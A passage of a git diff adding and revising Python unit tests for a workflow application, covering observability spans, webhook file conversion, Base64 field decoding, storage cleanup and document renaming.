mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py new file mode 100644 index 0000000000..bf013c4bae --- /dev/null +++ b/api/tests/unit_tests/libs/test_encryption.py @@ -0,0 +1,150 @@ +""" +Unit tests for field encoding/decoding utilities. + +These tests verify Base64 encoding/decoding functionality and +proper error handling and fallback behavior. +""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" + encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" + + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage") def get_example_filename() -> str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file 